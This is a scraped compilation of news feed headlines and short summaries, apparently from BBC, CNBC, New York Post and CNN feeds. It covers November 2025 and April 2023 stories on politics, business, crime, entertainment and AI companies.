Date of publish: Thu, 06 Nov 2025 13:32:39 GMT

Busiest US airports face flight reductions because of government shutdown

Flight capacity will be cut at major airports as air traffic controllers report issues with fatigue amid staff shortages.

Article link

Date of publish: Thu, 06 Nov 2025 18:20:31 GMT

Great Barrier Reef may partially recover from 'grim future' if global warming stays below 2C

A new study has found certain corals are more resilient in warmer waters, giving hope to the world-famous reef.

Article link

Date of publish: Thu, 06 Nov 2025 02:11:49 GMT

William announces Earthshot Prize 2025 winners in Rio

Winners include a project for making the Atlantic Forest financially viable and a global ocean treaty initiative.

Article link

Date of publish: Thu, 06 Nov 2025 10:06:45 GMT

Man held after cars in German city found smeared with swastikas in blood

Cars, walls and postboxes were defaced, in what appeared to be human blood.

Article link

Date of publish: Thu, 06 Nov 2025 15:28:12 GMT

Miss Universe contestants walk out after organiser berates Miss Mexico

Video of the incident, which was live streamed, has been shared widely on the internet.

Article link

Date of publish: Wed, 05 Nov 2025 22:19:46 GMT

Fan ban 'incredibly sad' - Maccabi Tel Aviv chief

Maccabi Tel Aviv chief executive Jack Angelides calls for a separation between football and politics after away fans were banned from Thursday's Europa League game at Aston Villa.

Article link

Date of publish: Wed, 05 Nov 2025 22:45:21 GMT

Conservative justices sharply question Trump tariffs in high-stakes hearing

If the court rules against Trump's tariffs, it could force the US to refund some of the billions it has collected.

Article link

Date of publish: Thu, 06 Nov 2025 02:39:08 GMT

German nurse gets life in jail after murdering 10 to reduce workload

The palliative care nurse was convicted of the murder of 10 patients, and the attempted murder of 27 others.

Article link

Date of publish: Thu, 06 Nov 2025 02:37:52 GMT

South Africans trapped in Donbas after joining Russia-Ukraine war, Ramaphosa says

It is unclear whether the citizens were fighting on behalf of Russia or Ukraine.

Article link

Date of publish: Thu, 06 Nov 2025 10:14:00 GMT

Sudan's life-saving community kitchens on verge of collapse

This follows confirmation by a global hunger monitor that famine conditions are spreading in conflict zones.

Article link

Date of publish: Thu, 06 Nov 2025 15:04:04 GMT

Was climate change to blame for the strength of Hurricane Melissa?

A new study find that Hurricane Melissa's rapid intensification was six times more likely because of climate change.

Article link

Date of publish: Thu, 06 Nov 2025 14:56:10 GMT

Inside Gaza, BBC sees total devastation after two years of war

With endless rubble and destroyed streets as far as the eye can see, any plans for Gaza's future are a far cry from where it is today, writes Lucy Williamson.

Article link

Date of publish: Wed, 05 Nov 2025 18:24:16 GMT

Are Christians being persecuted in Nigeria as Trump claims?

Donald Trump says thousands of Christians are being killed in Nigeria - where has he got the numbers from?

Article link

Date of publish: Thu, 06 Nov 2025 09:27:08 GMT

Why the fall of this city would matter to Ukraine and Russia

The battle for Pokrovsk - on a big road and rail artery in the Donetsk region - has been going on for well over a year.

Article link

Date of publish: Thu, 06 Nov 2025 16:35:32 GMT

Watch: Cars pile up on Philippines streets after typhoon

Floods have swept through towns, killing at least 85 people and leaving 75 others missing.

Article link

Date of publish: Thu, 06 Nov 2025 05:24:44 GMT

Smiles and joy inside Mamdani's victory party

BBC News correspondent Nada Tawfik reports from inside the Zohran Mamdani's mayoral victory party.

Article link

Date of publish: Wed, 05 Nov 2025 07:50:24 GMT

Watch: US election night's big winners… in 90 seconds

Zohran Mamdani, who will become New York City's youngest mayor since 1892, said in his victory speech that his win was a 'mandate for change'.

Article link

Date of publish: Wed, 05 Nov 2025 05:36:32 GMT

Smoke hangs over Louisville after deadly plane crash

Three people have died and officials expect more fatalities after a UPS plane crashed during takeoff.

Article link

Date of publish: Wed, 05 Nov 2025 02:15:28 GMT

Shipping containers swept away in deadly Philippines floods

At least three people have died, officials say. Residents sought shelter from high water on rooftops.

Article link

Date of publish: Tue, 04 Nov 2025 05:42:19 GMT

US Top News and Analysis

Tesla says shareholders approve Musk's $1 trillion pay plan with over 75% voting in favor

Tesla shareholders approved CEO Elon Musk's historic pay package at the company's annual shareholders meeting in Austin, Texas.

Article link

Date of publish: Thu, 06 Nov 2025 23:23:04 GMT

SNAP benefits must be fully paid by Trump administration by Friday, judge orders

The Trump administration recently said it would not pay any SNAP benefits, but then offered partial funding of the food stamp program after a judge's ruling.

Article link

Date of publish: Thu, 06 Nov 2025 22:28:21 GMT

Trump AI czar Sacks says 'no federal bailout for AI' after OpenAI CFO's comments

Sacks' comments came after OpenAI CFO Sarah Friar mentioned a federal "backstop" during a conference.

Article link

Date of publish: Thu, 06 Nov 2025 18:11:40 GMT

McDonald's U.S. boss puts focus on 'value and affordability' as consumer spending splits

McDonald's U.S. President Joe Erlinger told operators the brand was "moving in the right direction" as it continues a more-than-yearlong push on value.

Article link

Date of publish: Thu, 06 Nov 2025 21:00:27 GMT

FAA announces flight reductions at 40 airports. Here's where cuts are expected and what travelers need to know

The Federal Aviation Administration announced a reduction across 40 airports beginning Friday. Here's what travelers need to know.

Article link

Date of publish: Thu, 06 Nov 2025 21:36:45 GMT

Take Two sinks 7% on delay of Grand Theft Auto VI to November 2026

GTA VI was initially set for a fall 2025 launch but has faced multiple delays.

Article link

Date of publish: Thu, 06 Nov 2025 22:40:14 GMT

Why Thanksgiving turkey prices might give shoppers a shock this season

Avian flu virus decimated turkey flocks in the United States to their lowest level in 40 years before the 2025 holiday season.

Article link

Date of publish: Thu, 06 Nov 2025 19:05:42 GMT

Matthew McConaughey, Ryan Reynolds-backed password manager tops $400 million in ARR on AI tail winds

Canadian cybersecurity startup 1Password has surpassed $400 million in annual recurring revenue.

Article link

Date of publish: Thu, 06 Nov 2025 17:52:49 GMT

Peloton posts bullish holiday forecast, betting that shoppers will spend big on new product lineup

Peloton beat Wall Street's expectations on the top and bottom lines and issued strong holiday guidance.

Article link

Date of publish: Thu, 06 Nov 2025 23:15:15 GMT

Duolingo stock plunges 25%, its worst session ever, as company prioritizes user growth

CEO and co-founder Luis von Ahn told CNBC that the company has shifted its investment strategy in recent months to focus on long-term initiatives.

Article link

Date of publish: Thu, 06 Nov 2025 21:07:09 GMT

Doordash has biggest one-day drop ever as stock falls 17% on spending concerns

Doordash has already shelled out billions this year to buy restaurant booking platform SevenRooms and British delivery platform Deliveroo.

Article link

Date of publish: Thu, 06 Nov 2025 21:10:17 GMT

Here's how much weight loss drugs could cost you under Trump's deals with Eli Lilly, Novo Nordisk

The monthly out-of-pocket cost of popular injections and upcoming pills could range from $50 to $350, depending on the dosage and insurance coverage.

Article link

Date of publish: Thu, 06 Nov 2025 19:45:10 GMT

Airbnb shares rise on revenue beat, stronger-than-expected forecast

Shares of Airbnb rose in extended trading after the company reporter third-quarter results that beat revenue expectations.

Article link

Date of publish: Thu, 06 Nov 2025 21:24:30 GMT

Startup Omada Health to start prescribing GLP-1s, other obesity medications as membership grows 

The announcement expands the offerings under the company's weight management program as its membership grows to more than 800,000.

Article link

Date of publish: Thu, 06 Nov 2025 21:26:15 GMT

Ford reportedly considers ending production of all-electric F-150 Lightning

Ford is considering ending production of its all-electric F-150 Lightning pickup truck amid mounting losses and challenging market conditions for EVs.

Article link

Date of publish: Thu, 06 Nov 2025 21:20:14 GMT

Apple's AI roadmap looks brighter — plus, Costco delivers upbeat sales numbers

Every weekday, the Investing Club releases the Homestretch; an actionable afternoon update just in time for the last hour of trading.

Article link

Date of publish: Thu, 06 Nov 2025 20:05:42 GMT

Retailers' holiday hiring to hit lowest level since the Great Recession, says major industry trade group

The major industry group's prediction offers the latest glimpse into the jobs market as the record government shutdown stretches on.

Article link

Date of publish: Thu, 06 Nov 2025 19:48:52 GMT

Sam Altman says OpenAI will top $20 billion in annualized revenue this year, hundreds of billions by 2030

OpenAI has inked more than $1.4 trillion of infrastructure deals, raising questions about how it will pay for those commitments.

Article link

Date of publish: Thu, 06 Nov 2025 20:15:47 GMT

DC sandwich thrower Sean Dunn found not guilty of assaulting federal agent

Former DOJ employee Sean Dunn was charged with tossing a Subway sandwich at a federal officer who had been deployed to Washington by President Trump.

Article link

Date of publish: Thu, 06 Nov 2025 20:28:40 GMT

Meta reportedly projected 10% of 2024 sales came from scam, fraud ads

Meta projected that about $16 billion in 2024 revenue came from running ads for scams and banned goods, according to a Thursday report from Reuters. 

Article link

Date of publish: Thu, 06 Nov 2025 18:46:51 GMT

Microsoft forms superintelligence team under AI chief Suleyman 'to serve humanity'

The MAI Superintelligence Team will pursue research for improving artificial intelligence companions, diagnosing diseases and generating renewable energy.

Article link

Date of publish: Thu, 06 Nov 2025 20:43:41 GMT

This fintech unicorn just launched an AI agent to handle billions of dollars in CRE lending

Built Technologies unveiled an AI agent for what's known as draw requests, when developers or construction firms ask lenders for the next stage of financing.

Article link

Date of publish: Thu, 06 Nov 2025 16:45:08 GMT

Target's sloppier stores are wearing on shoppers, and its turnaround could hinge on cleaning them up

The big-box retailer, which has long relied on stores as fulfillment hubs, is tweaking its approach to try to improve customers' experiences within the aisles.

Article link

Date of publish: Thu, 06 Nov 2025 15:16:19 GMT

OpenAI CFO Sarah Friar says company isn't seeking government backstop, clarifying prior comment

OpenAI CFO Sarah Friar said in a LinkedIn post that the artificial intelligence company is not seeking a government backstop for its infrastructure commitments.

Article link

Date of publish: Thu, 06 Nov 2025 19:08:49 GMT

Job cuts in October hit highest level for the month in 22 years, Challenger says

Job cuts for October totaled 153,074, a 183% surge from September.

Article link

Date of publish: Thu, 06 Nov 2025 14:17:33 GMT

Datadog's stock soars 23% on revenue beat, posts second-best day ever

Datadog has rolled out multiple artificial intelligence technologies as the AI boom boosts demand for cloud security.

Article link

Date of publish: Thu, 06 Nov 2025 21:08:16 GMT

Younger consumers are eating less Chipotle and Cava. They are buying more Coach bags

The split in company results indicates consumers are splurging in some areas, as they save in others.

Article link

Date of publish: Thu, 06 Nov 2025 20:22:03 GMT

Nancy Pelosi announces retirement from Congress

Pelosi, who represented California for decades, made history as the first female speaker of the House of Representatives.

Article link

Date of publish: Thu, 06 Nov 2025 19:34:21 GMT

Judge dismisses Boeing criminal case over 737 Max crashes at DOJ request despite skepticism

Judge Reed O'Connor said a DOJ nonprosecution agreement with Boeing "fails to secure the necessary accountability to ensure the safety of the flying public."

Article link

Date of publish: Thu, 06 Nov 2025 20:27:58 GMT

Snap stock jumps 9% after announcing Perplexity AI deal, reporting strong revenue

Perplexity will integrate its AI-powered search engine directly into the Snapchat app.

Article link

Date of publish: Thu, 06 Nov 2025 21:00:53 GMT

New York Post

Los Angeles put politics first — and sparked its worst-ever wildfire

City leaders put politics over preparedness, allowing January's disastrous Palisades Fire to burn out of control — and bringing on a collapse in morale and public trust.

Article link

Date of publish: Thu, 06 Nov 2025 18:27:40 -0500

‘Grand Theft Auto VI’ release date delayed by months for a second time

Shares of the company, which had previously said it would launch the title on May 26, were down 7% in extended trading.

Article link

Date of publish: Thu, 06 Nov 2025 18:25:29 -0500

Charges against ‘Jersey Boy jihadists’ show Islamic radicalization can touch any community, Alina Habba warns

19-year-old Montclair residents Tomas-Kaan Jimenez-Guzel and Milo Sedarat were both arrested for allegedly plotting ISIS-inspired terror attacks and spewing antisemitism.

Article link

Date of publish: Thu, 06 Nov 2025 18:23:45 -0500

Cheeky Hailey Bieber serves ‘body goals’ in thong bikinis during Kendall Jenner’s birthday getaway

Jenner's star-studded tropical beach bash took place on Monday.

Article link

Date of publish: Thu, 06 Nov 2025 18:23:02 -0500

Cheeky Hailey Bieber serves ‘body goals’ in thong bikinis during Kendall Jenner’s birthday getaway

Jenner's star-studded tropical beach bash took place on Monday.

Article link

Date of publish: Thu, 06 Nov 2025 18:23:02 -0500

Jalen Brunson has done more than figure it out in new Knicks offense

Brunson’s figuring it out. Dare we say, he’s excelling. 

Article link

Date of publish: Thu, 06 Nov 2025 18:21:59 -0500

‘Tax the rich’ chant breaks out as Gov. Hochul takes the stage at Zohran Mamdani, NY AG Letitia James event

SAN JUAN, Puerto Rico — It’s the Zoh show. Mayor-elect Zohran Mamdani jetted down to Puerto Rico for the annual SOMOS political retreat, where he basked in his victory by co-hosting a cocktail reception Thursday with embattled ally Attorney General Letitia James. Chants of “tax the rich” broke out as Gov. Kathy Hochul took the stage...

Article link

Date of publish: Thu, 06 Nov 2025 18:21:44 -0500

Christina Applegate calls out ‘RHOSLC’ cast’s ‘super gross’ behavior with ‘Below Deck’ crew

The "Below Deck" crew recently took part in two crossover episodes with the "Real Housewives of Salt Lake City" cast.

Article link

Date of publish: Thu, 06 Nov 2025 18:16:58 -0500

Christina Applegate calls out ‘RHOSLC’ cast’s ‘super gross’ behavior with ‘Below Deck’ crew

The "Below Deck" crew recently took part in two crossover episodes with the "Real Housewives of Salt Lake City" cast.

Article link

Date of publish: Thu, 06 Nov 2025 18:16:58 -0500

Stream It Or Skip It: ‘All Her Fault’ On Peacock, Where A Kidnapping Uncovers Lots Of Secrets In A Family That Seemingly Has It All

Sarah Snook, Dakota Fanning, Jake Lacy, Abby Elliott, Jay Ellis and Michael Peña star in the thriller based on Andrea Mara's novel.

Article link

Date of publish: Thu, 06 Nov 2025 18:15:00 -0500

Temu offers ‘aggressive’ payouts to lure US retailers as Chinese company grapples with tariffs

“Introduce your seller to sell on Temu and earn $1000” Temu wrote to an Amazon consultant.

Article link

Date of publish: Thu, 06 Nov 2025 18:14:27 -0500

New York City URGENTLY needs a sane City Council speaker

With Mayor-elect Zohran Mamdani taking office Jan. 1, New York City desperately needs some steady hands at the top of city government: Having the City Council tap Julie Menin as its next speaker would be a great start.

Article link

Date of publish: Thu, 06 Nov 2025 18:10:42 -0500

Accused NJ jihadi yuppie teen spewed vile antisemitic hate, wanted to murder mom’s Jewish friends: feds

Milo Sedarat, a privileged teen from affluent Montclair, New Jersey, was arrested at the $1.2 million home of his parents Tuesday morning after espousing grotesque fantasies about murdering Jews, including calling for "mass executions" and boasting he was "the biggest antisemite in America."

Article link

Date of publish: Thu, 06 Nov 2025 18:05:29 -0500

Alec Baldwin bashes Radio City’s live-animal Nativity scenes in new activist ads targeting Christmas Spectacular

The "30 Rock" star's latest shot against the decades-old practice came in a PETA-backed ad set to air on Canada's CTV starting Thursday. said the stage production is "highly stressful" to the show's sheep, camels and donkeys.

Article link

Date of publish: Thu, 06 Nov 2025 17:58:48 -0500

Newark International Airport facing flight delays of nearly 3 hours due to government shutdown – and it will only get worse

The lengthy delay is in effect until at least the early hours of Friday morning, the FAA said.

Article link

Date of publish: Thu, 06 Nov 2025 17:50:15 -0500

Top 6 moments in President Trump and Nancy Pelosi’s political feud

In a surprising announcement on social media on Nov. 6, Former House Speaker Nancy Pelosi said she plans to retire at the end of her current term, ending a four-decade career in the lower chamber. The first woman to wield the speaker’s gavel and President Trump have shared an infamously contentious relationship over the years....

Article link

Date of publish: Thu, 06 Nov 2025 17:47:36 -0500

The Original ‘Predator’ Has a Great Cast, But 2010’s ‘Predators’ Might Have an Even Better One

Predators doesn't have any future governors, but it does boast two different two-time Oscar winners. Oh, and WALTON GOGGINS, too!

Article link

Date of publish: Thu, 06 Nov 2025 17:45:00 -0500

I’m about to boycott Starbucks over its stupid bear cup

Looking for the bearista cup? I got you.

Article link

Date of publish: Thu, 06 Nov 2025 17:42:00 -0500

US reveals new stealth nuclear missiles on Cold War bomber — the second show of force in a week

The US military was spotted testing its nuclear-capable bomber equipped with what appeared to be a long-range atomic weapon — just as the Air Force was preparing to test its Minuteman III Intercontinental Ballistic Missile this week.

Article link

Date of publish: Thu, 06 Nov 2025 17:41:15 -0500

Long Island GOP surges as insiders warn Zohran Mamdani’s agenda has ‘no allure in the suburbs’

Nassau County Republicans romped at the polls partly because a strategy to tie local Democrats to Zohran Mamdani "clearly worked" because his socialist agenda has "no allure in the suburbs," insiders said.

Article link

Date of publish: Thu, 06 Nov 2025 17:34:31 -0500

Elise Stefanik will announce run for NY governor Friday: sources

The prominent GOP congresswoman will make the highly-anticipated announcement either in a video or in Albany, sources said.

Article link

Date of publish: Thu, 06 Nov 2025 17:34:22 -0500

Politicians on both sides of the aisle are waffling on moral consistency — and it’s time to get a backbone

In the span of a month, Sen. Bernie Sanders has excused a Nazi tattoos on a Democratic candidate and Vice-President JD Vance seemed unbothered by jokes about Hitler in a Young Republican group chat. 

Article link

Date of publish: Thu, 06 Nov 2025 17:31:17 -0500

CNN.com - RSS Channel - HP Hero

Some on-air claims about Dominion Voting Systems were false, Fox News acknowledges in statement after deal is announced

Article link

Date of publish: Wed, 19 Apr 2023 12:44:51 GMT

Dominion still has pending lawsuits against election deniers such as Rudy Giuliani and Sidney Powell
Here are the 20 specific Fox broadcasts and tweets Dominion says were defamatory

• Fox-Dominion trial delay 'is not unusual,' judge says • Fox News' defamation battle isn't stopping Trump's election lies

Article link

Date of publish: Mon, 17 Apr 2023 16:01:11 GMT

Judge in Fox News-Dominion defamation trial: 'The parties have resolved their case'

The judge just announced in court that a settlement has been reached in the historic defamation case between Fox News and Dominion Voting Systems.

Article link

Date of publish: Wed, 19 Apr 2023 08:28:17 GMT

'Difficult to say with a straight face': Tapper reacts to Fox News' statement on settlement

A settlement has been reached in Dominion Voting Systems' defamation case against Fox News, the judge for the case announced. The network will pay more than $787 million to Dominion, a lawyer for the company said.

Article link

Date of publish: Tue, 18 Apr 2023 21:17:44 GMT

Millions in the US could face massive consequences unless McCarthy can navigate out of a debt trap he set for Biden

• DeSantis goes to Washington, a place he once despised, looking for support to take on Trump • Opinion: For the GOP to win, it must ditch Trump • Chris Christie mulling 2024 White House bid • Analysis: The fire next time has begun burning in Tennessee

Article link

Date of publish: Tue, 18 Apr 2023 20:34:45 GMT

White homeowner accused of shooting a Black teen who rang his doorbell turns himself in to face criminal charges

• 'A major part of Ralph died': Aunt of teen shot after ringing wrong doorbell speaks • 20-year-old woman shot after friend turned into the wrong driveway in upstate New York, officials say

Article link

Date of publish: Wed, 19 Apr 2023 04:29:05 GMT

Newly released video shows scene of Jeremy Renner's snowplow accident

Newly released body camera footage shows firefighters and sheriff's deputies rushing to help actor Jeremy Renner after a near-fatal snowplow accident in January. The "Avengers" actor broke more than 30 bones and suffered other severe injuries. CNN's Chloe Melas has more.

Article link

Date of publish: Tue, 18 Apr 2023 14:09:43 GMT

Jake Gyllenhaal and Jamie Lee Curtis spent the Covid-19 lockdown together

It's sourdough bread and handstands for Jake Gyllenhaal and Jamie Lee Curtis.

Article link

Date of publish: Tue, 18 Apr 2023 14:40:32 GMT

Toddler crawls through White House fence, prompts Secret Service response

A tiny intruder infiltrated White House grounds Tuesday, prompting a swift response from the US Secret Service.

Article link

Date of publish: Tue, 18 Apr 2023 17:38:16 GMT

Jamie Foxx remains hospitalized nearly a week after 'medical complication'

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a "medical complication," a source with knowledge of the matter told CNN on Monday.

Article link

Date of publish: Tue, 18 Apr 2023 00:27:07 GMT

A 13-year-old dies after participating in a Benadryl TikTok 'challenge'

A 13-year-old in Ohio has died after "he took a bunch of Benadryl," trying a dangerous TikTok challenge that's circulating online, according to a CNN affiliate and a GoFundMe account from his family.

Article link

Date of publish: Wed, 19 Apr 2023 15:01:06 GMT

See pizza delivery guy take out suspect fleeing police

Pizza guy delivers more than a pie, taking out a fleeing suspect. CNN's Jeanne Moos shows him putting his best foot forward.

Article link

Date of publish: Tue, 18 Apr 2023 16:40:22 GMT

Netflix is winding down its DVD business after 25 years

Netflix is officially winding down the business that helped make it a household name.

Article link

Date of publish: Tue, 18 Apr 2023 20:10:51 GMT

FTC chair Lina Khan warns AI could 'turbocharge' fraud and scams

Artificial intelligence tools such as ChatGPT could lead to a "turbocharging" of consumer harms including fraud and scams, and the US government has substantial authority to crack down on AI-driven consumer harms under existing law, members of the Federal Trade Commission said Tuesday.

Article link

Date of publish: Tue, 18 Apr 2023 17:59:38 GMT

Eating too much of these foods is driving the rise in type 2 diabetes, study says

Gobbling up too many refined wheat and rice products, along with eating too few whole grains, is fueling the growth of new cases of type 2 diabetes worldwide, according to a new study that models data through 2018.

Article link

Date of publish: Mon, 17 Apr 2023 16:02:46 GMT

ADHD medication abuse in schools is a 'wake-up call'

At some middle and high schools in the United States, 1 in 4 teens report they've abused prescription stimulants for attention deficit hyperactivity disorder during the year prior, a new study found.

Article link

Date of publish: Tue, 25 Apr 2023 17:44:36 GMT

Apple CEO was presented with an original Macintosh. See his reaction

CEO Tim Cook personally welcomed customers to the new Apple store in Mumbai as the tech company opens its first retail stores in India. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:17:25 GMT

Democrats bash Justice Clarence Thomas but their plan to investigate ethics allegations is unclear

Senate Democrats railed against Justice Clarence Thomas on Tuesday amid reports that the Supreme Court conservative failed to disclose luxury travel, gifts and a real estate transaction involving a GOP megadonor, but their plan to investigate the conservative jurist remains unclear.

Article link

Date of publish: Tue, 18 Apr 2023 20:29:46 GMT

Russia is 'going backwards' in equipment and deploying post WWII-era tanks, according to Western officials

• Jailed Wall Street Journal reporter Evan Gershkovich denied detention appeal in Moscow • Putin visits Russian troops at military headquarters in Kherson • Watch moment WSJ journalist appears in Russian court

Article link

Two Russians claiming to be former Wagner commanders admit killing children and civilians in Ukraine

Two Russian men who claim to be former Wagner Group commanders have told a human rights activist that they killed children and civilians during their time in Ukraine.

Article link

Date of publish: Tue, 18 Apr 2023 19:07:52 GMT

'My stomach is hurting from laughing': Hear panelist's reaction to DeSantis' threat to Disney

CNN panelists react to Florida Gov. Ron DeSantis floating the idea of building a competing theme park next to Disney World in Orlando.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:56 GMT

GOP prepared to block vote to replace Feinstein on Senate Judiciary

Senate Majority Leader Chuck Schumer said on Tuesday that he hopes to replace Democratic Sen. Dianne Feinstein on the Senate Judiciary Committee with Sen. Ben Cardin of Maryland and aims to set up a floor vote on the issue this afternoon, which Republicans are expected to block.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:13 GMT

Oklahoma governor calls on officials to resign over recording of racist and threatening remarks

Article link

Date of publish: Tue, 18 Apr 2023 17:33:17 GMT

McCarthy slams Biden in handling of US debt

House Speaker Kevin McCarthy traveled to Wall Street on Monday to deliver a fresh warning that the House GOP majority will refuse to lift a cap on government borrowing unless Biden agrees to spending cuts that would effectively neutralize his domestic agenda.

Article link

Date of publish: Tue, 18 Apr 2023 22:03:01 GMT

US warns Russia not to touch American nuclear technology at Ukrainian nuclear plant

The US has sensitive nuclear technology at a nuclear power plant inside Ukraine and is warning Russia not to touch it, according to a letter the US Department of Energy sent to Russia's state-owned nuclear energy firm Rosatom last month.

Article link

Date of publish: Wed, 19 Apr 2023 08:35:33 GMT

Repeated gunshots fired on live TV as ex-lawmaker shot by assassins

Atiq Ahmed, a former lawmaker in India's parliament, convicted of kidnapping, was shot dead along with his brother while police were escorting them for a medical check-up in a slaying caught on live television on Saturday. CNN's Vedika Sud reports.

Article link

Date of publish: Tue, 18 Apr 2023 09:41:42 GMT

FDA clears the way for additional bivalent boosters for certain vulnerable individuals

The U.S. Food and Drug Administration amended the terms of its emergency use authorizations for the Pfizer and Moderna bivalent vaccines on Tuesday, allowing people ages 65 and older and certain people with weakened immunity to get additional doses before this fall's vaccination campaigns.

Article link

Date of publish: Tue, 18 Apr 2023 15:09:15 GMT

Maine authorities detained a person of interest after 4 people were found dead in a home and 3 others shot while driving

Maine authorities have detained a person of interest and continue to investigate after two shooting incidents that appear to be connected left at least four people dead and three others injured, state police said.

Article link

Date of publish: Wed, 19 Apr 2023 01:49:51 GMT

Southwest says flights resumed after delays caused by 'tech issues'

• Delta Air Lines reports record bookings for summer travel • Air France and Airbus acquitted in trial over 2009 plane crash

Article link

Date of publish: Tue, 18 Apr 2023 17:15:29 GMT

Damar Hamlin cleared to resume football activities after January cardiac arrest

Buffalo Bills safety Damar Hamlin, who has been cleared to resume football activities, said Tuesday his cardiac arrest during an NFL game in January was caused by commotio cordis.

Article link

Date of publish: Tue, 18 Apr 2023 22:11:37 GMT

Pilot makes history after landing on top of a 56-story hotel

Polish pilot Lukasz Czepiela made history after landing a plane on a helipad at the top of a 56-story hotel in Dubai.

Article link

Date of publish: Sun, 19 Mar 2023 11:22:30 GMT

Top US Navy admiral defends non-binary sailor amid some Republican criticism

The top US Navy admiral ardently defended a non-binary sailor on Tuesday amid some criticism from Republican lawmakers, saying he is "particularly proud of this sailor."

Article link

Date of publish: Tue, 18 Apr 2023 19:56:40 GMT

Fulton County DA says fake Trump electors are incriminating one another and wants lawyer disqualified

The Fulton County District Attorney's office said some fake electors for Donald Trump have implicated each other in potential criminal activity and is seeking to disqualify their lawyer, according to a new court filing.

Article link

Date of publish: Wed, 19 Apr 2023 15:31:24 GMT

High speed trains are racing across the world. But not in America

High speed trains have proved their worth across the world over the past 50 years.

Article link

Date of publish: Wed, 19 Apr 2023 02:39:40 GMT

Podcast: One country musician is calling for other artists to oppose assault rifles
Here's what you need to know if you haven't filed your return yet — and even if you have

It's April 18, the official deadline to file your federal and state income tax returns for 2022. (It is also, apparently, National Animal Crackers Day for those who celebrate.)

Article link

Date of publish: Tue, 18 Apr 2023 14:15:43 GMT

Undocumented immigrants are paying their taxes today, too

It's a surprising fact that's often overlooked in the immigration debate.

Article link

Date of publish: Tue, 18 Apr 2023 18:29:24 GMT

Opinion: Why millionaires like us want to pay more in taxes

Tuesday is Tax Day in America, one of the most stressful days of the year, when many taxpayers will finally end their procrastination, file their federal returns, and hope for a refund from the IRS. But for many of the nation's wealthiest, it's just another Tuesday.

Article link

Date of publish: Mon, 17 Apr 2023 19:32:49 GMT

'World's longest' purpose-built cycling tunnel opens in Norway

There are many ways to explore the seven mountains that surround the picturesque UNESCO World Heritage city of Bergen on Norway's fjord-studded west coast. The newest, however, might well be record-breaking.

Article link

Date of publish: Tue, 18 Apr 2023 10:44:27 GMT

Artist rejects photo prize after AI-generated image wins award

A German artist has rejected an award from a prestigious international photography competition after revealing that his submission was generated by Artificial Intelligence (AI).

Article link

Date of publish: Tue, 18 Apr 2023 15:27:54 GMT

These ships disappeared in Lake Superior a century ago. Watch as they're found again

The Great Lakes Shipwreck Historical Society has found two of three ships that sank in the same Lake Superior storm more than a century ago, locating one in 2021 and the other in 2022.

Article link

Date of publish: Tue, 18 Apr 2023 19:29:01 GMT

Erotic images of seniors show sex and intimacy in new light

What does intimacy look like for seniors? There's no end to sex scenes and other steamy content featuring the young and unwrinkled, but past a certain age, popular culture largely draws a blank — or treats sex as a punchline.

Article link

Date of publish: Tue, 18 Apr 2023 03:24:57 GMT

China's economy is off to a solid start, rising 4.5% in Q1 2023

China's economy is off to a solid start in 2023 following its emergence from three years of strict pandemic restrictions.

Article link

Date of publish: Tue, 18 Apr 2023 07:01:12 GMT

Even when wives make as much as husbands, they still do more at home

• Four out of the five US metro areas with the lowest unemployment are in Florida. Here's why • Opinion: The overlooked problem with raising the retirement age for Social Security

Article link

Date of publish: Sun, 16 Apr 2023 17:29:49 GMT

McDonald's is upgrading its burgers

McDonald's, which has been focusing on upgrading its core items to boost sales, is rolling out a series of changes designed to improve its signature burgers.

Article link

Date of publish: Mon, 17 Apr 2023 16:31:30 GMT

Google-parent stock drops on fears it could lose search market share to AI-powered rivals

Shares of Google-parent Alphabet fell more than 3% in early trading Monday after a report sparked concerns that its core search engine could lose market share to AI-powered rivals, including Microsoft's Bing.

Article link

Date of publish: Mon, 17 Apr 2023 15:52:19 GMT

Bidets save you money and reduce waste — we tested the best options out there
50+ products to make your life easier and our planet cleaner
Mother's Day is around the corner. Here are 50+ thoughtful gifts she'll love
A head-to-toe guide of how men should dress this spring, and where they should shop
42 of the most useful travel products you can buy on Amazon
The 7 best high-yield savings accounts of April 2023
Taxes are due tomorrow. Here's how to file for an extension
Composting is an easy way to reduce food waste. Here's how to do it
We stopped using aluminum foil for cooking and you should too. Here's what to use instead
The beloved Dyson Supersonic hair dryer is at its lowest price ever
Everything you need to know about Way Day 2023, Wayfair's biggest sale of the year
The 10 best Amazon deals to shop this week
Mifepristone saved my life

The ruling earlier this month by a Texas federal judge to suspend the US Food and Drug Administration's approval of a drug that is used frequently for medication abortions, is very personal for me.

Article link

Date of publish: Tue, 18 Apr 2023 11:30:00 GMT

The 2024 presidential alternative many voters will want
Why isn't the House Judiciary Committee looking into Thomas?

On Monday, the GOP-controlled House Judiciary Committee — chaired by Donald Trump ally Rep. Jim Jordan — is set to hold a field hearing in New York City called "Victims of Violent Crime in Manhattan." A statement bills the hearing as an examination of how, the Judiciary Committee says, Manhattan District Attorney Alvin Bragg's policies have "led to an increase in violent crime and a dangerous community for New York City residents."

Article link

Date of publish: Mon, 17 Apr 2023 11:37:37 GMT

Top secrets come spilling out

In 1917, British analysts deciphered a coded message the German foreign minister sent to one of his country's diplomats vowing to begin "unrestricted submarine warfare" and seeking to win over Mexico with a promise to "reconquer the lost territory in Texas, New Mexico and Arizona" if the US entered the world war. When it became public, the Zimmerman Telegram caused a sensation, helping propel the US into the conflict against Germany.

Article link

Date of publish: Sun, 16 Apr 2023 11:22:36 GMT

How did Sudan go from casting off despotic rule to this?

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

Article link

Date of publish: Mon, 17 Apr 2023 22:45:23 GMT

Michelle Yeoh set to return in new 'Star Trek' movie

Live long and prosper, Michelle Yeoh.

Article link

Date of publish: Tue, 18 Apr 2023 19:11:23 GMT

Recap: 'Succession' finds dark humor in the aftershocks

After the shock came the aftershocks, the power vacuum, and perhaps most significantly and impressively, the laughs, as "Succession" pivoted to face life after Logan Roy, in an episode that finally put the HBO show's title into full flower.

Article link

Date of publish: Mon, 17 Apr 2023 02:28:12 GMT

'Yellowjackets' leans hard into '90s music nostalgia, and we're here for it

Of the many dark gifts Showtime's eerie hit series "Yellowjackets" serves up for us, the juiciest this season is by far the music.

Article link

Date of publish: Mon, 01 May 2023 23:02:04 GMT

Jeremy Renner revisits 'the amazing group of people' who helped him recover from his accident

